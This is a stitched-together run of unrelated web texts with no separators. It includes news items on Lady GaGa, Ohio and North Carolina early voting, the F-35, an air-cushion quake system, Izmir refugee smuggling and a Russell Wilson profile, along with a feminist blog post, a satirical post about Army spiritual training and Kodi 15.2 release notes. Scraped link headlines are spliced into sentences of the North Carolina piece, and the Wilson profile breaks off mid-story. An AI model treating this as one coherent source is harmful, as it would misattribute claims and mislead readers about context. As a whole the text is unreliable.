Lady GaGa performed a stripped-down version of new track 'Americano' during the first night of the Mexican leg of her world tour.
The 'Judas' star took to the piano to perform a theatrical rendition of the track, which deals with various social issues that have recently hit the headlines in America.
Describing the track during an interview with Vogue last month, GaGa explained: "[It's] a big mariachi-techno-house record, where I am singing about immigration law and gay marriage and all sorts of things that have to do with disenfranchised communities in America.
"It sounds like a pop record, but when I sing it I see Edith Piaf in a spotlight with an old microphone."
GaGa recently released two different country-specific tracklistings for her new album Born This Way, with the UK version boasting an extra track.
Born This Way is due to be released on May 23.
Watch Lady GaGa perform 'Americano' live on tour below:
Discussion Time: Intersectional Feminism
We have to talk about it: feminism has an ugly, ugly past. From Rebecca Latimer Felton, a first wave feminist, encouraging lynchings, to suffragettes asking black women to walk at the back of the Woman's Suffrage Parade, to the hateful rhetoric of thirdwave radfems such as Julie Bindel, to the racist musings of “feminist champions” Lena Dunham and Amy Schumer on Twitter, feminist icons have a long, varied history of exclusionary behavior. All of these actions call into question both the past - and the future - of feminism, especially considering the current tone among radical feminists that feminism is for cisgendered, female-identifying people alone. Intersectionality & incluvity are important to fourth-wave feminism, especially considering feminism's racist past.
Intersectionality is the study of or careful attention to various intersections in identities that cause varied levels of privilege or oppression in people. It's important to note that intersectionality addresses not only issues of race and sex, but also: physical/mental ability, sexuality, gender identity, and class, among others.
Without paying attention to how various identities affect people's day-to-day lives, the feminist movement has defaulted to “white feminism”. Wealthy, white women like Lena Dunham, Amy Schumer, Emma Watson, and Gloria Steinem are the figure-heads of the movement – which makes the movement seem only available to a small subset of women. Additionally, feminists in the House and Senate (and those feminists who vote for those women) end up supporting bills & measures that disproportionately negatively affect women of color and impoverished women (like the Hyde Amendment). The issues addressed by feminist figureheads are superficial - such as the “Free the Nipple” campaign. Instead of real, meaningful change, white feminism prefers campaigns that will attract a significant amount of press or that will go viral on social media. Often times these campaigns leave the true problems - like the fact that the gender pay gap is heavily influenced by race, that statistics on rapes go up when both racial and sexual identity is factored in, or the idea that women can be women without having breasts (and that not all people with breasts are women) - behind in the dirt.
Basically, white feminism is the movement equivalent to selling “save the tatas” slogans on t-shirts instead of actually donating money to Planned Parenthood.
Intersectionality can - and needs to - be integrated into feminism in several ways:
the use of non-gendered language in slogans, hashtags, and materials such as pamphlets and signs
recognition of the contributions that nonwhite and nonstraight/cis people have made to the feminist movement
decentering feminism from only the US and begin to use it to address problems that are global in nature
decentering personal feminism so that individual feminists aren't only acting towards things that are beneficial to only their identity groups
Intersectional and inclusive feminism can benefit the movement overall! Here's how:
fourth wave feminism is divided, and the movement has been for a while – especially along racial and class lines – integrating intersectionality can help unite the movement.
intersectional & inclusive feminism will allow for feminism's continued viability as a social movement, as more people will feel like they have access to the movement
When I discuss feminism on this blog, I am talking about a feminism that is intersectional, inclusive, and continually works towards establishing equality and equity for all people. My feminism strives to be this way, and I think yours should as well. Without it, the movement trends towards either the superficial or the hateful, and that worries me.
Sergeant Poe's Law Firm has been alerted.
“Here is undeniable pictorial evidence that the Army is forcing me to learn Wiccan rituals.” Sergeant Poe
Here is the link to the Virtual Spiritual Fitness Center… act quickly before the new world order deletes the page. They even control Google Cache! Christians, are you thinking to yourself, “I can't believe the Army is forcibly teaching our soldiers about Wiccan rituals! That is un-American!” But they are. It's all part of the left-wing socialist agenda. They think that alternative religions are part of how we reduce suicides! IDIOTS! These minorities are forcing their witch craft on our Christian soldiers! (end of Poe)
Now are you paying attention, Christians? Good.
It's time to learn a lesson about Christian Privilege
Wiccan beliefs are hardly even mentioned on the optional, but bizarre virtual spiritual fitness site. Within the mandatory training, there is a passing reference or two to Yoga, Buddha and Islam.
Guess what religion is actually forced on Soldiers who take this new 130 million dollar mandatory spiritual testing and training? Christianity!
This is a sample from the hours and hours of mandatory remedial spiritual fitness training. This picture comes from the portion where they teach soldiers how to fold the flag like a good little Christian. It's entirely representative of the training as a whole.
Weren't you upset when you thought there was a chance that Wiccan beliefs were part of mandatory training taught to Christians?
Are you still upset that Muslim and Buddhist viewpoints are indeed part of the mandatory training?
Shouldn't a soldier's religious choices be a private thing that the Government can't mandate?
Christians, do not comment until you read the next link (brace yourself)
Please, read here to see what many of your fellow Christians in foxholes are going through when they fail the new Spiritual Fitness test. It's disgusting. Christian Soldiers are just as offended as atheist soldiers (like myself), but we need all of you to care.
Even though there is no large-scale Wiccan spell casting class, you still need to fight back. I know many Christians are able to work with atheists, Jews, Muslims, etc. for many things. Please make this one of those things.
Please speak out against this clear-cut violation of the Establishment and the No Religious Test clauses of the U.S. Constitution. Tell the White House that the Spiritual Fitness testing and training is unconstitutional and to please do something about it!
Atheists:
Please spread the word to your Christian friends about Sergeant Poe. I hear the internet has named a law after him. Now Poe's law is best invoked when used for great justice.
Last fall, Mathew Arthur found himself looking for a new place to live.
He had been living with his two brothers in a house in Vancouver, but they decided to move back to their hometown of Kelowna, B.C.
Arthur, a graphic designer, considered finding something a little smaller, perhaps a bachelor suite.
But then he had an even smaller idea: making a home in the back of a van for up to a year as a way to simplify his life and test the limits of small-scale living.
He found a 1987 Dodge Ram van on Craigslist for $500, added a few hundred dollars in upgrades to add a bed, shelving and a sink, and parked it in an alley on the east side of Vancouver nearly five months ago.
The setup leaves him with about 40 square feet of space — about half of which is taken up by his bed.
"It started really just as an exercise in small-scale space, just to see if I could live a little bit more of a simple way, day to day," says Arthur.
"I never intended it as a political or social or ecological experimentation, but the interesting latent function of living this way is I'm learning a lot of lessons about my footprint."
Arthur used an industrial cabinet and some carpentry skills to install shelving, and he made a small stool out of wood. He has a small refrigerator, a stereo and spot for his Macbook. Before moving in, he sold most of his furniture, put 10 boxes in storage and took three boxes of belongings with him into the van.
Mathew Arthur had to find creative ways to work comfortably in the tight confines of the van. (Mathew Arthur/Tumblr)
He works from inside the van, at coffee shops or in the offices of his graphic design clients.
A 20-metre extension cord runs power from an outlet in a nearby house, and Arthur says he doesn't have much trouble finding places to shower, bathrooms to use or kitchens to cook in.
"Instead of relying on the comfort and insular nature of my own home, I'm forced to go out and find things to do and people to be with," he says.
Initially, Arthur's plan was to live in the van for an entire year, starting Jan. 1.
However, he says he was recently accepted into graduate school and isn't sure he wants to start a master's program while living in a van. He may end a few months early in September, though he hasn't yet decided.
Arthur also planned to post regular updates throughout the year on his blog — vanyear.com — though he hasn't posted anything since late February.
Several months in, Arthur says he's learned a lot about what it's like to live in such a small space and get by with less stuff around him.
The experience has also reinforced his opinion of Vancouver as an expensive place to live.
"For a city that touts its planning culture and its sustainable initiatives, it's unaffordable and there's no communal space," he says.
WORTHINGTON, Ohio — Facing a massive early voting deficit less than two weeks out from election day, the Romney campaign is projecting a mixed message as the candidate works to keep alive his claim to momentum.
At issue is the question of whether Republicans are losing the early voting battle on purpose, as they say, or whether simply can't get their base to break their habit of voting on election day.
In memos and press gaggles, Republicans insist they're so far behind by strategic choice — focusing their efforts on helping unlikely voters get to the polls now, and leaving their enthusiastic base to fend for themselves on November 6.
"The GOP is focusing on turning out 'low-propensity' voters and we are doing it succesfully — cutting into the Dems' advantage from 2008," Republican National Committee spokesman Tim Miller wrote in a memo to press Thursday. "The Democrats on the other-hand are investing heavily in turning out voters who were already going to vote on election day."
But as Mitt Romney and Senator Rob Portman zig-zagged across Ohio Thursday, they repeatedly made a point of pleading for early votes from the cheering partisans who gathered at their rallies — the very group the campaign says they're not trying to get to the polls.
"There's one thing we haven't all done yet, and that's go down and vote," Portman said in a Cincinnati warehouse rally. "In Ohio, as you know, we have early voting, and at the board of elections right now they're open for business! So how about after this event we get in our cars and go down to Broadway and vote early to be sure we can bank our votes and be sure on election we have more time to ensure other people get to the polls."
"Will you do that to me?" he asked the crowd, prompting loud cheers. "Go vote early!"
Later, Romney added, "I need you to commit as well, not only to vote and vote early. I won't say often, just vote early."
To rally his own base, Obama made a show of voting in Chicago Thursday, becoming the first president in history to cast his ballot early. Meanwhile, Republicans and Democrats exchanged a flurry of chart-laden press releases and statistic-studded Tweets debating who had the edge.
In Ohio, most estimates have Obama leading Romney in early voting by about 30 points: 60 percent to 30 percent. It is true that Democrats have historically had an early-voting advantage, while Republicans tend to win the turnout battle on election day. But in the final stretch of the race — when every stump speech line and scheduling decision is dissected for signs of "confidence" — the Romney campaign seems unsure of its own posture on the issue.
Meanwhile, on the ground in Ohio, Republican voters seemed largely removed from the back-and-forth. Patty Grierson, a poll worker from Columbus and Romney supporter, said she's seen much larger turnout from Obama voters so far — but she said she wasn't concerned.
"I'm old-fashioned that I think it's a privilege to vote and I've always enjoyed going to the polls on election day," she said. "This time I figured it was going to be a big crowd, and I would be working, so I voted early. But I've always felt that tends to go to Obama, the early voters. At least that's always been my thinking."
Election officials in nearly two dozen North Carolina counties have approved reductions in early-voting hours ahead of November's elections, cuts that Democrats warn could disenfranchise many low-income voters.
County boards of elections have approved reducing early-voting hours in 23 of North Carolina's 100 counties. Another eight counties plan to end early voting on the Sunday before Election Day, when a huge number of African-American voters tend to go to the polls.
ADVERTISEMENT
North Carolina is a critical swing state in the presidential race, one where Democratic nominee Hillary Clinton Hillary Diane Rodham ClintonSanders: 'I fully expect' fair treatment by DNC in 2020 after 'not quite even handed' 2016 primary Sanders: 'Damn right' I'll make the large corporations pay 'fair share of taxes' Former Sanders campaign spokesman: Clinton staff are 'biggest a--holes in American politics' MORE is counting on a heavy African-American voter turnout. President Obama won North Carolina in 2008 and narrowly lost the state in 2012.
The battle for the Senate majority also goes through North Carolina. Sen. Richard Burr Richard Mauze BurrHillicon Valley: Senators urge Trump to bar Huawei products from electric grid | Ex-security officials condemn Trump emergency declaration | New malicious cyber tool found | Facebook faces questions on treatment of moderators Key senators say administration should ban Huawei tech in US electric grid Five tantalizing questions about Mueller's investigation MORE (R) is in a tough race with former Democratic state Rep. Deborah Ross. Gov. Pat McCrory (R) also faces a difficult reelection battle.
Mecklenburg County, home of 682,000 registered voters who live in and around Charlotte, will allow 2,504 hours of early voting, far more than any other county in North Carolina but fewer than the 2,742 hours available ahead of the 2012 elections.
The county elections board voted in August to open six early-voting sites during the first seven days of early voting and 16 additional sites during the last 10 days.
County officials are required to open polls for at least 17 days of early voting. A 2013 election reform measure would have reduced that number to 10 early-voting days, though the 4th Circuit Court of Appeals blocked that law earlier this summer.
Each county's elections board is composed of two members of the governor's party and one member of the minority party. That means boards even in heavily Democratic counties like Mecklenburg are run by two Republicans. At the August meeting, Carol Williams, the only Democrat on the Mecklenburg panel, filed a dissenting plan that would have increased the number of early-voting hours there.
Counties in which elections board split along partisan lines send their plans to the state Board of Elections, which will decide to approve or amend plans in a meeting Thursday.
The county decisions come after Dallas Woodhouse, the executive director of the state Republican Party, sent an email to GOP activists urging Republican elections board members to make changes to early-voting times. Woodhouse wrote that many Republicans opposed Sunday voting out of respect for religious preferences.
“Six days of voting in one week is enough. Period,” Woodhouse wrote. He accused Democrats of mounting a concerted push to expand early voting in counties where it would favor them.
Democrats say cuts to early-voting hours will reduce voter access, especially among African-American and low-income voters.
“We're disappointed so many counties have reduced early voting hours,” said Dave Miranda, a spokesman for the state Democratic Party. “We support any effort to expand ballot access and make voting more easily accessible for legally registered voters.”
Amid charges that cuts to early-voting hours are targeted specifically at African-American voters, three counties with the highest percentages of black residents will see those hours reduced.
Bertie County, where 62 percent of residents are black and Obama scored 66 percent of the vote in 2012, will hold 117 fewer early-voting hours in 2016 than four years earlier. Northampton and Edgecombe counties, both 58 percent black, will see their early-voting hours reduced by 37 and 31, respectively.
The steepest cuts to early-voting hours came in Lenoir County, southeast of Raleigh, which will keep early voting open for just 106 hours, down from 443 hours in 2012. Though registered Democrats outnumber registered Republicans by a more than 2-to-1 margin in the rural area, Republican nominee Mitt Romney won the county by 2 percentage points in 2012.
Republicans point to the fact that the vast majority of North Carolina counties will expand the number of early-voting hours in 2016 — including some of the most Democratic counties in the state.
Durham County officials voted in August to open five polling stations in the first week and eight more for the final 10 days of early voting, for a total of 1,541 hours, a 50 percent increase over the number of hours in 2012. Guilford, Forsyth, Buncombe and Wake counties, all of which voted for Obama over Romney in 2012, will expand their early-voting hours, too.
Seventy counties will allow more hours of early voting than they did in 2012, according to an analysis by Raleigh's The News and Observer. Six counties will hold the same number of early-voting hours as four years ago, and one county did not submit a plan.
While eight county boards voted to end Sunday early voting, three other counties decided to open their doors to Sunday voters for the first time in 2016. Those three counties — Rowan, Greene and Hyde — all voted for Romney in 2012.
Thousands of North Carolina voters will kick off the 2016 election season later this week, when the state begins putting absentee ballots in the mail. The first early-voting locations open Oct. 22, 17 days before Election Day.
The chief of naval operations has penned an opinion column that has military analysts buzzing over whether it signals the Navy may be the first military branch to jettison the costly F-35 stealth fighter jet.
Adm. Jonathan W. Greenert's column in the current issue of Proceedings magazine questions the value of radar-evading technology, or stealth, in flying to a target and bombing it in a world of rapidly improving radars.
At the same time, the Navy's top officer champions the future of unmanned planes and standoff weapons such as ship-fired cruise missiles. Adm. Greenert also mentions the ongoing budget-cutting environment in Washington.
The Navy has planned to buy about 480 of the aircraft-carrier version of the F-35, even as the stealth fighter jet's costs have skyrocketed and the Navy prepares to shrink its fleet of ships for lack of money.
To military analysts, all of Adm. Greenert's points add up to a conclusion that the Navy is having second thoughts about pouring billions of dollars into the F-35 Joint Strike Fighter.
Not true, says the admiral's spokesman.
“Those reports are wrong,” Navy Lt. Nate Curtis said. “The CNO [chief of naval operations] has stated he is committed to the Joint Strike Fighter.
“The CNO was not talking about a commitment to the Joint Strike Fighter. That isn't the issue. He was talking about stealth in the future and looking at the return on investment. That's what he talks about in that article,” Lt. Curtis said.
That has not stopped analysts from conjecturing about the Pentagon's most expensive acquisition program in an era of mounting federal debt.
“Adm. Greenert's controversial — and, potentially, hugely consequential — article raises several interesting points, among which is the contention that advances in sensing capabilities and electronic and cyberwarfare will increasingly degrade America's stealth arsenal,” wrote Mackenzie Eaglen, an analyst at the American Enterprise Institute. “This is not news. What is news, however, is the head of the Navy signaling a tepid commitment to the military's largest acquisition program.”
In his column, Adm. Greenert does not mention the fighter by name, but he does note the limits of stealth technology. And the Navy is buying only one stealth aircraft — the F-35.
“We appear to be reaching the limits of how much a platform's inherent stealth can affordably get it close enough to survey or attack adversaries,” Adm. Greenert says in a magazine that serves as a sounding board for active and retired officers. “And our fiscal situation will continue to require difficult trade-offs, requiring us to look for new ways to control costs while remaining relevant.”
The admiral, a former submarine commander now in the first year of a four-year term, writes of advances in radars and computers that can detect even the best stealth planes as they near a target.
“The Navy has been sending signals for a long time,” said Winslow Wheeler, an analyst at the Center for Defense Information, a budget reform group. “The most recent Greenert comments in Proceedings shows that longstanding information, available for decades, about the vulnerability of stealth to long-wavelength radars is beginning to sink in as the realizations of the gigantic dollar, tactical and reliability costs escalate.”
Designed as a multipurpose fighter to replace the Air Force's F-16 Falcons and the Navy's F-18 Hornets, the F-35 now carries a price tag of $395.7 billion for 2,443 planes.
It has suffered technical failures and huge cost overruns, prompting Sen. John McCain, Arizona Republican, in December to call it “both a scandal and a tragedy.”
The Government Accountability Office reported in June that total acquisition costs in the past five years ballooned 42 percent, to $395 billion. Full-rate production now is not scheduled to begin until 2019, a six-year delay.
In the most recent Pentagon budget review, in which $487 billion was cut from the 10-year spending plan, Defense Secretary Leon E. Panetta opted to stretch out procurement but not terminate the program.
The services know, however, that another wave of budget cuts is looming — about $500 billion if Congress cannot agree on a deficit-reduction plan by January. In that case, analysts say, some procurement budget lines will be in jeopardy, including the F-35.
The GAO criticized the Pentagon for its big bet on “concurrency” — that is, developing and producing the plane at the same time. The Pentagon is buying 365 F-35s before developmental flight tests are completed.
Said the GAO: “Development of critical-mission systems providing core combat capabilities remains behind schedule and risky. To date, only 4 percent of the mission systems required for full capability have been verified. Deficiencies with the helmet-mounted display, integral to mission systems functionality and concepts of operation, are most problematic.”
Copyright © 2019 The Washington Times, LLC. Click here for reprint permission.
As Japan continues to rebuild after last year's devastating earthquake and tsunami, one company has developed an ingenious new method to protect homes from the shaking—let them ride it out on a cushion of air.
The method, developed by Air Danshin Systems Inc., is radically different than conventionally employed dampers and band isolation systems. When the quake strikes, it activates a sensor on the property. This sensor then activates a large air compressor that forces air into a bag situated in the home's foundation. As pressure builds, the home will levitate 3cm and gently ride out the shaking, safe from the tremors below. Homeowners can also steady the home as it floats by using an indoor air valve. As the shaking subsides, the house settles back upon its foundation.
Advertisement
The system is currently being installed in 88 homes across Japan. The system is also being considered for larger structures and more important structures—including government buildings, office high-rises, and life-size Gundam statues. [Air Danshin via Inhabitat]
At Emre's boat shop in central Izmir, one of Turkey's main ports, you can't turn around without bumping into a pile of inflatable rubber boats. On this day there are 16 stacked in beige boxes, all numbered with the same inscrutable code, SK-800PLY, and all newly delivered from China. If Emre's maths is right, all of them will be discarded on a Greek beach within a couple of days. For Emre's shop is where you can buy boats that take refugees to Europe – and where they are still being sold at a rate of nearly a dozen a day.
“In the summer we were selling more,” Emre tells a potential Syrian customer. “But right now we're still selling six of the cheaper boats every day, and five of the more expensive ones. How many do you want?”
Turkey putting Syrian refugees 'at serious risk of human rights abuse' Read more
European officials met with their Turkish counterparts on Sunday, in a bid to persuade Turkey to do more to stem Europe's greatest wave of mass migration since the second world war. Despite the worsening weather, another 125,000 asylum seekers have arrived in Greece from Turkey in November – about four times as many as during the whole of 2014. And the biggest proportion probably passed through this quarter of Izmir.
Smuggling happens in plain sight here – leave Emre's shop, turn right up Fevzi Paşa boulevard, one of Izmir's main drags, and the signs of the smuggling economy are everywhere. “On the left are the hotels where the smugglers house their clients,” says Abu Khalil, a smuggler who wanders down the street with the Guardian. “And on the right are the insurance shops.” This is where the passengers deposit their fees, which are then released to the smugglers when word comes that they have reached the Greek coast.
Street vendors sit on the pavement, selling party balloons to refugees – not to celebrate with, but to act as watertight cases during the sea crossing. Many shops on the street now sell lifejackets, at least as a sideline. One kebab shop has a dozen for sale, including little ones for children, and there are even a couple in a shop that specialises in police uniforms. But it is the shoe and clothes shops that are really cashing in, with some now pushing lifejackets as their main product.
“We only sell two or three pairs of shoes a day,” says one shop assistant on Fevzi Paşa boulevard. “But we're still selling between 100 and 300 lifejackets. In the summer sometimes it was a thousand – the factories couldn't keep up.”
The blatant nature of the smuggling trade in Izmir has led the perception that Turkey turns a blind eye to illegal departures from its western shoreline. Turkey not only bars most Syrians from legal work, giving them little incentive to remain in the country, but officials appear to do little to stop their movement. The hotels and shops near Fevzi Paşa boulevard are squeezed between two police stations that lie less than a kilometre apart – and yet police only sporadically respond to a phenomenon that occurs close to their doorstep.
There is a similar sense of permissiveness in Çeşme, the coastal town west of Izmir that acts as the springboard for smuggling trips to the Greek island of Chios. Taxi drivers in Çeşme are wary of taking passengers to the departure points themselves, for fear of being arrested for smuggling, but on the approach to the beaches concerned the Guardian found they were unguarded and accessible to all.
The Turkish government rejects these criticisms. It says police have arrested more than 200 major smugglers since 2014 and have turned back nearly 80,000 of their passengers – even as the country hosts about 2.2 million Syrian refugees, more than any other nation in the world. “At this point, we are doing everything in our power to stop the flow of refugees and prevent additional casualties,” said a Turkish government spokesman, in an email to the Guardian. “In our experience, however, the main issue is that refugees are willing to try again and again if they are caught.”
The numbers bear out this last point. The flow of refugees has fallen since October, when up to 10,000 were leaving for Greece every 24 hours, but it still remains high. After a few days' lull due to bad weather, the daily departure rate almost hit the 5,000 mark again last week, according to Greek government data.
Smugglers say this is down to two things. “The main reason is the explosion of the war,” says Abu Khalil, the smuggler in Izmir, who is a Syrian Kurd. Like many others, he argues that recent Russian airstrikes in rebel-held parts of Syria have made the situation even less liveable.
The second factor is that those affected now also find it cheaper to leave. Two smugglers said the cost of a seat on an inflatable boat to Greece has fallen from $1,200 in September to $900 a fortnight ago, and finally $800 in recent days. “People who didn't have the money before, they can come now,” says Abu Khalil, an Arabic pseudonym that means “Khalil's father”.
Some passengers, like the family of Alan Kurdi, start from Bodrum, a smaller Turkish resort town to the south, best known in Europe for its hotels and beaches. Others are driven all the way from Istanbul but it's simpler to start from Izmir and Bodrum, which involve shorter drives to the places where the smugglers launch their boats. The beaches nearest Bodrum are the gateways to the Greek islands of Kos, Leros and Kalymnos. Those who end up in Chios, Samos and Lesbos – the choice is left to the smuggler, rather than the passenger – will have left from Istanbul or Izmir.
The latter city is no stranger to refugees. In 1922, thousands of Izmir's Greek residents fled to the harbour, after Turkish troops re-took the previously Greek-held city and a week-long fire burnt much of it down. For days, western ships moored just off the shore refused to rescue them.
Facebook Twitter Pinterest YouTube footage of the Great Fire of Smyrna (as Izmir was then known)
Today, people find it far easier to leave the city. The warren of streets that surrounds Fevzi Paşa boulevard is full of brokers sidling up to scared Syrians, easily identifiable by their backpacks and apprehension, and offering them trips to Greece. Once a deal is struck, they are hustled into shabby hotels that the smugglers often block-book for this purpose. Late at night, the smugglers arrange for trucks and buses to drive them for a few hours through the darkness to the relevant shore. Sometimes this is a hellish trip that sees people squashed into former cattle trucks. Sometimes the process is far less arduous and they just take public transport.
Different smugglers describe different working practices, but each network operates in broadly the same way. There are the brokers, like Abu Khalil, who must find the 40 or 50 passengers needed to fill each boat and keep them entertained in the hotels until it is time to go. Then there are the drivers who bring them to the shore, and the workmen who deliver the rubber boats and engines and assemble them at the departure points.
Libya's people smugglers: inside the trade that sells refugees hopes of a better life Read more
If the network smuggles mainly Syrian passengers, then the network will likely be staffed by Syrians, usually working for a Syrian boss. But that boss will also need Turkish partners, such as the landowners who control the beaches from which the boats leave. Typically, these landowners will work with several networks and will take a significant cut of their profits. Their complicity is crucial to the smugglers' success.
“You can't just leave from any place, so I would say the Turkish guy is the major player in the process,” says Abu Khalil. “Without him, the trips would not take place.”
A smuggler from another crew says his group rents beaches from several different landlords, to give themselves the options of sending people to several different Greek islands or changing locations at the last minute if the police suddenly arrive. “We keep an eye on the points, and once we see one is clear, we use it,” says Mohamad, a Syrian smuggler. “Nothing is haphazard and everything is planned.”
Each network makes vast profits, although their accounting differs from group to group. Mohamad sets out his accounts as follows: in peak season, a boat of 40 passengers paying $1,200 per person brought in a turnover of $48,000. The brokers would take between $75 and $300 of each payment, leaving at least $36,000 for the rest of the group. During the September peak, the most expensive boat cost $8,500 and the engines cost $4,000, although prices have since fallen. The mechanics and the driver collectively need another $4,000, while hotel rooms for the refugees collectively cost about $500 a night. The beach owners are paid in different ways but often charge a 15% levy on every passenger's fee – meaning that they pocket about $6,000 per boat.
Trading in souls: inside the world of the people smugglers Read more
At the end, the lead smuggler is left with at least $13,000. If he undercuts his brokers and also squeezes onboard another 10 passengers, he could end up doubling his profit, so many cram in 50 passengers rather than the promised 40, and send the boats out without enough fuel. Migrants who get cold feet on the beach sometimes report that they are forced onboard at gunpoint.
But still, people keep coming. Despite the worsening weather, and despite the fallout from the Paris attacks, at least one of which is thought to have involved someone who took a boat from Turkey, thousands are still leaving shores near Izmir every day.
To Abu Khalil, it is obvious why. Most Syrians cannot work legally in Turkey, while the war is getting worse in Syria. “We know about what happened in Paris but we are desperate,” he says. “And we have no other option.”
Abu Khalil would know. In the coming days, he will finally try to get to Europe himself.
Additional reporting: Abdulsalam Dallal. Emre's name has been changed.
Once a ‘final' version is released some new bugs and/or problems usually appear out of nowhere, and last release was no exception. Even though tens of thousands of users were already testing the 15.0 version before release and we try very hard to prevent them, as soon as a million started using it, some problems we either did not think of or which we did not notice popped up. To counter some of these new issues, we're bringing you this second maintenance release candidate called 15.2 RC1 which has some additional fixes on top of the 15.0 and 15.1 release.
This is still a release candidate; once enough users have verified that these improvements work out well, and we did not introduce any major regressions, we'll be releasing it as final 15.2 version. To be safe just backup your userdata (online manual) first.
It should be ok to just install this on top of your current Kodi 15.0 or 15.1 version. For the MySQL users out there; we never bump the database versions in our bugfix or maintenance releases – you can safely keep using it within your network.
Most important fix done
Over time the Android version has travelled some bumpy roads. This is due to the fact there are tens of thousands of different devices out there with each it's own Android version and each a slightly different firmware and hardware. Firmware is the part where the manufacturer of the device has to make sure the works as it should like audio and video output. This time after the 15.0 release it became clear that for several devices using an Amlogic chipset there was a change in firmware that caused Kodi to not function properly and only show a zoomed in or only used part of the screen. Devices that came from manufacturers that had properly updated their firmware did not have this problem. However for some this never happened and caused all the problems you might have experienced. One method was to put special build firmware on the device which fixes the problem and Kodi would just work fine again. Sadly this is a quite technical process and could brick your device if not done properly. Luckily a community developer invested a lot of time in tracking down the problem and together with our main Android developer came to a solution for fixing this. Past week we provided some special builds on the forum which solved the problems for the users that had the zoomed in or partial screen using Kodi. As such we included these changes into the 15.2 RC build for every one to test and hopefully get their device working again. Secondly some playback problem popped up for many Android users where they lost video after fast-forward playback. This should now have been correct as well (if you had not yet got the extra Play Store update for 15.1).
Should you still experience problems with this build please provide feedback on our forum or in this 15.2 specific test thread: link Be sure to provide sufficient information.
Fixes done in this RC 1 version
• Updated taglib that fixes a crash when playing flac files
• Fix volume adjustment for XBOX controllers
• Fixes side flyout appearing when using touch
• Fixes freeze on win32 on away mode
• Fix crash on osx 10.7 when trying to resolve hdd names
• Fix Amlogic zoom problems on Android
• Set default screen region for dvb subs (wrong placed subtitles)
• Fix missing lyrics from tag when playing from musicdb url
• Properly set the time format when setting/changing regions
• Fix playback problems on AMLogic after ffwd or skip
• Fix fallback for nb_no language
• Fix empty LatestAlbum.Artist
• Fix watched flag in Confluence media info 3 view
The complete technical list can be found on our Github milestones.
Improvements so far in version 15
More in depth information can be found through the following links about the 15 release.
Add-ons
General: So far in version 15 there are no add-on changes that would impact any add-ons except for PVR. Since our 12.x Frodo release there have been some gradual changes but in general all add-ons, even from that time should still work, of course there are some exceptions. If the add-ons worked in Gotham and in Helix then we are happy to say that all these add-ons should still work.
Skins: As of this moment, all skins that worked in 14.x Helix should still work in 15 Isengard. In the PVR sections there are certain changes that might be noticeable and need specific skin changes. These changes are minimal and shouldn't cause any major problems in usability. There still might be some options still missing which you relied upon first. We're sure that most skin creators will be updating the skins in due time. Before that happens you should be able to enjoy this beta build without any problems.
Windows 10 problems
Users who have installed Windows 10 should make sure that they have the correct video card drivers installed. We see a lot of problems that have to do with this reported on the forum. It's not something we as team can do anything about. Make sure you have updated all drivers according to the manufacturers website in case you are experiencing problems. Windows 10 has just been released and as such is still in active development. Another thing that might be helpful is installing the special Kodi version 15 DirectX11 build which is mentioned a bit further down.
DirectX 11 upgrade (not included in 15.0 or 15.1)
Although this release post is all about the 15.0 version, mentioning the DX11 upgrade for next version is very important. Since switching from OpenGL in 2009, Kodi (and XBMC in the past) has used the DirectX 9 implementation for various tasks of rendering the user interface and media playback. This almost dates back to the XBOX days. With the hardware industry moving and focussing more on the newer DX11 with their drivers, more people have problems with running our outdated DX 9 version. This could range from simply not starting, crashing just after loading, playing videos or having problems with hardware acceleration. One of our developers afedchin took on this task and completely revised our DirectX 9 implementation and upgraded it to the more current standard of DirectX 11. Don't worry if you still have an older card, we only use low level features so you don't need to run to the shop for new gear. If you are having problems on Windows you can head to our forum where you can find the most recent build available which is currently based on our 15.0 release. We appreciate all the feedback we can get. Read more: here on our forum. Again this will not be part of our 15.x releases. It has already been successfully merged into our future 16.0 release.
Conclusion
Should you want to download and install this build please visit our download page.
Other Software
In addition to creating Kodi, the members of Team Kodi have created official remotes to be installed on your tablet or phone.
Kore™ (Android) Official Kodi Remote (iOS)
Like Kodi™ itself, both official remotes are free and open source software.
Get involved
Getting involved is quite easy. Simply take the plunge and start using these 15.0 Isengard builds. If you use these builds, we encourage you to report problems with these builds on our forum first and after that, if asked, submit bugs on Trac (following this guide: How to submit a bug report). Do note that we need detailed information so we can investigate the issue. We also appreciate providing support to other users in our Forums where you can, or donate to the XBMC Foundation if you like. You can of course also follow or help promote Kodi on all available social networks. Read more on the get involved page.
Credit: Collegiate School, Richmond, Va.
Back in the summer of 2006, a handful of college coaches descended upon the campus of the Collegiate School in Richmond, Virginia, to ask head coach Charles McFall about Russell Wilson.
Wilson was the star quarterback for the Cougars, who were in the middle of a run that would lead to three consecutive state titles, but his dazzling prep resume didn't seem to matter much to the coaches at the next level.
McFall, who served as the head coach at Collegiate from 1986 to 2006, recalls most of them having a similar question for him—one that made him laugh and frustrated him at the same time.
"[College coaches] kept asking, 'Do you think he can play defensive back?'" McFall remembers. "I said, 'Yeah, but he's a quarterback.' Anybody who has ever coached and had somebody who had that type of talent knows what a quarterback is. I told them, 'I never coached in college, and I can't tell you what you need. What I can tell you is what kind of player he is, what kind of person he is. If you talk to any coach who has coached against him, they will tell you too.' [College coaches] were always hung up on the height. Never once questioned arm strength, speed or size. It was always height."
Of course, that same issue has dogged the current Seattle Seahawks Pro Bowl passer throughout his career. However, his habit of proving his doubters wrong began during his career at Collegiate.
In fact, ask anyone familiar with him and his time there, and you're likely to get a story with a common theme: Wilson wasn't your average high school athlete—on or off the field.
One of McFall's favorite stories occurred when Wilson was a ball boy and his older brother played for the Cougars.
"Everybody was crowded around the sideline, and the ref wanted the ball quickly," McFall explains. "I heard the ref yell, 'Get the ball in!' Russell was in either sixth or seventh grade at the time. Next thing I know, that ball went flying across the field and everyone looked around and it was like, 'Wow!' At an early age, he had a really nice arm."
Credit: Collegiate School, Richmond, Va.
Will O'Brien, who is currently the Associate Athletic Director at Collegiate, was interviewing for the strength coach position back in 2005. Wilson was part of a student panel selected to participate in part of O'Brien's interview process.
"I remember, and none of the ADs told me who this kid is, but I distinctly remember this young man leaning over the table, and he had more questions than anyone else," O'Brien recalls. "It was like, 'Hey, how do I get faster? How do I get stronger? I'm a baseball player and a quarterback. What are the things that I need to do to get better?'"
Wilson made plenty of plays on the field, but his coaches were equally impressed with his leadership skills and work ethic.
Those were the two traits that led McFall to emphatically back his star player and his merits as a quarterback during his recruiting process.
While colleges doubted Wilson's prowess at the game's most important position because of his height, there were other reasons that schools—particularly those in the ACC footprint—hesitated to recruit Wilson.
Since Wilson wasn't a household name in recruiting circles, McFall helped him come up with a plan to attack his recruitment, beginning in the summer of 2006.
